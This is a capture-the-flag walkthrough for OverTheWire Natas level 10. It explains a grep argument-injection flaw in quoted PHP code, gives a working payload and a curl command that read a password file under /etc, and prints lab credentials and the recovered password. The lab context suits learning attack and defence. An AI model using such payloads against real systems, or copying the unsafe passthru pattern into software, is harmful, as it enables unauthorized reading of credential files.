OverTheWire Natas Level 9 → 10 tutorial!!

Login

URL: http://natas10.natas.labs.overthewire.org
Credentials: natas10:t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu

# Using curl (optional):
curl -u natas10:t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu http://natas10.natas.labs.overthewire.org/

Task

The page provides a search box again. But unlike level 9, it restricts some characters.

A little bit of Theory

From the source (index-source.html):

<?php
$key = "";
if (array_key_exists("needle", $_REQUEST)) {
  $key = $_REQUEST["needle"];
}
if ($key != "") {
  if (preg_match('/[;|&]/',$key)) {
    print "Input contains an illegal character!";
  } else {
    passthru("grep -i $key dictionary.txt");
  }
}

• Characters ;, |, & are blocked.
• But we can still exploit grep with regex.
• Trick: use .* (regex wildcard) before the file path → grep will print the file contents.

Further reading:

• PHP: preg_match
• OWASP: Command Injection

Solution

1. Inspect the code and notice blocked symbols but not filenames.

   

2. Exploit grep with regex:

   In the search field, enter:

   .* /etc/natas_webpass/natas11
   

   Or with curl:

   curl -u natas10:t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu \
     --data-urlencode 'needle=.* /etc/natas_webpass/natas11' \
     http://natas10.natas.labs.overthewire.org/
   

3. Read the output: the password file is echoed directly.

   

Password

UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk

Troubleshooting

• Got “illegal character” message? → Avoid ;, |, &. Stick to regex tricks.
• Still seeing empty results? → Make sure you prepend .* (it matches everything).
• Curl not working? → Add --data-urlencode to properly encode special chars.

Nice 🎉 You bypassed the filter by using grep regex and dumped the next password. Onward to natas11!

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨